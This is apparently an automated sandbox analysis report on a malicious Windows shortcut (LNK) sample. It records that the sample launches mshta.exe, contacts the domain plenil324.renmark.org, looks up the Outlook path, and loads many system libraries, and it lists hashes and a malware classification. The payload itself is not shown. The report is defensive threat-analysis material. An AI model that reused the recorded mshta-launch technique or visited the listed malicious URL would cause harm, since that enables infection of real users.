Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?5/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: plenil324.renmark.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.google.com.br

Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr

Source: global traffic	DNS traffic detected: DNS query: plenil324.renmark.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com.br

Source: mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1695505386.000001C17827D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: hTtpS://plenil324.renmark.org/?5/
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: http://schema.org/WebPage
Source: mshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: mshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com.br/&ec=G
Source: mshta.exe, 00000001.00000002.1696878826.000001C178373000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C17837D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C178380000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://drive.google.com/?tab=wo
Source: mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://maps.google.com/maps?hl=en&tab=wl
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://news.google.com/?tab=wn
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/.
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/X
Source: mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/lF
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/s
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/o
Source: mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br
Source: mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br/
Source: mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br/4
Source: mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br/AGKb
Source: mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br/IGSb
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.google.com.br/imghp?hl=en&tab=wi
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.google.com.br/setprefdomain?prefdom=US&sig=K_9c1NRihZ1C8fmrqCmNFA0_i0-OY%3D
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.google.com.br/setprefs?sig=0_1xoWnLa32iKp4MY2y_e7W7aV5SQ%3D&hl=pt-BR&source=home
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.youtube.com/?tab=w1

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62814

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.138.94:443 -> 192.168.2.4:62814 version: TLS 1.2

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal64.winLNK@1/1@2/2

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OY4DPIF3.htm

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: V323904LY3.lNK.lnk

Virustotal: Detection: 22%

Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\mshta.exe

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: mshta.exe, 00000001.00000002.1696618599.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior

ID:	1546603
Product:	CloudBasic
Start time:	08:27:10
Start date:	01.11.2024
Sample:	V323904LY3.lNK.lnk
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	2e4c1c46c2c57baf20ef148ec89e47a2
SHA1:	2823f47f3da40c531b538c8edc037c93325dabc5
SHA256:	8c787fa0ec9be5bf076e6c25682a7926aa188a5b9378066008785f165765bc34
Filetype:	Windows Shortcut (20020/1) 100.00%

Windows Analysis Report
V323904LY3.lNK.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report V323904LY3.lNK.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
V323904LY3.lNK.lnk